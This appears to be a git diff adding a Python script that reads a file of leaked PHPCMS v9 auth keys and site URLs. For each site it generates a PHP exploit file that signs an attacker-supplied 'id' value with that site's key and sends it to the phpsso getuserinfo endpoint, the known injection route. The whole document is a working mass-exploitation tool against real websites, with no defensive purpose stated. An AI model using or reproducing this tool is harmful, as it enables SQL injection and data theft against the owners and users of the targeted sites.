|
| 1 | +import requests |
| 2 | +import os |
| 3 | +import re |
| 4 | + |
| 5 | +keys=[] |
| 6 | +#if os.path.exists('v9.php'): |
| 7 | + # print('[+]ok v9.php') |
| 8 | +## print('[-]not found v9.php') |
| 9 | + # exit() |
| 10 | + |
| 11 | +xs=open('saveurl.txt','w') |
| 12 | +xs.close() |
| 13 | + |
| 14 | +print('[+]Write url') |
| 15 | +dw=open('phpv9_key_leak.txt','r') |
| 16 | +for j in dw.readlines(): |
| 17 | + ldw="".join(j.split('\n')) |
| 18 | + qe = re.finditer('(http|https)://(www.)?(\w+(\.)?)+', ldw) |
| 19 | + for q in qe: |
| 20 | + rc = re.findall("[a-zA-z]+://[^\s]*", str(q)) |
| 21 | + for j in rc: |
| 22 | + we = "{}".format(j).replace('>', '').replace("'", '') |
| 23 | + print(we,file=open('saveurl.txt','a')) |
| 24 | + |
| 25 | +wc=[] |
| 26 | +lo=open('keys.txt','w') |
| 27 | +lo.close() |
| 28 | + |
| 29 | +dkv=open('phpv9_key_leak.txt','r') |
| 30 | +for r in dkv.readlines(): |
| 31 | + wq="".join(r.split('\n')) |
| 32 | + qe=re.sub('(http|https)://(www.)?(\w+(\.)?)+','',wq) |
| 33 | + qc=re.sub('\|','',str(qe)) |
| 34 | + tx=re.findall('[a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9][a-z-A-Z-0-9]',str(qc)) |
| 35 | + for k in tx: |
| 36 | + print(k,file=open('keys.txt','a')) |
| 37 | + |
| 38 | + |
| 39 | +pds2=[] |
| 40 | +wqe2=[] |
| 41 | +pds=open('saveurl.txt','r') |
| 42 | +wqe=open('keys.txt','r') |
| 43 | +for b in pds.readlines(): |
| 44 | + pds2.append("".join(b.split('\n'))) |
| 45 | + |
| 46 | +for w in wqe.readlines(): |
| 47 | + wqe2.append("".join(w.split('\n'))) |
| 48 | + |
| 49 | +for x in range(int(len(pds2))): |
| 50 | + wwd=open('scv/{}.php'.format(x),'a+') |
| 51 | + |
| 52 | +dr=os.listdir('scv') |
| 53 | +for d in range(0,len(pds2)): |
| 54 | + print("""<?php |
| 55 | +set_time_limit(0); |
| 56 | +$wang_url = '{}'; """.format(pds2[d])+""" |
| 57 | +$auth_key = '{}';""".format(wqe2[d])+""" |
| 58 | +$str = "uid=1" . stripslashes($_GET['id']); |
| 59 | +$encode = sys_auth($str, 'ENCODE', $auth_key); |
| 60 | +$content = file_get_contents($wang_url . "/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data=" . $encode); |
| 61 | +echo $content; |
| 62 | +function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) |
| 63 | +{ |
| 64 | + $key_length = 4; |
| 65 | + $key = md5($key); |
| 66 | + $fixedkey = hash('md5', $key); |
| 67 | + $egiskeys = md5(substr($fixedkey, 16, 16)); |
| 68 | + $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(hash('md5', microtime(true)), -$key_length) : substr($string, 0, $key_length)) : ''; |
| 69 | + $keys = hash('md5', substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16)); |
| 70 | + $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); |
| 71 | + $i = 0; |
| 72 | + $result = ''; |
| 73 | + $string_length = strlen($string); |
| 74 | + for ($i = 0; $i < $string_length; $i++) { |
| 75 | + $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32})); |
| 76 | + } |
| 77 | + if ($operation == 'ENCODE') { |
| 78 | + return $runtokey . str_replace('=', '', base64_encode($result)); |
| 79 | + } else { |
| 80 | + if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) { |
| 81 | + return substr($result, 26); |
| 82 | + } else { |
| 83 | + return ''; |
| 84 | + } |
| 85 | + } |
| 86 | +} |
| 87 | +?> |
| 88 | +
|
| 89 | + """,file=open('scv/{}'.format(dr[d]),'a')) |
0 commit comments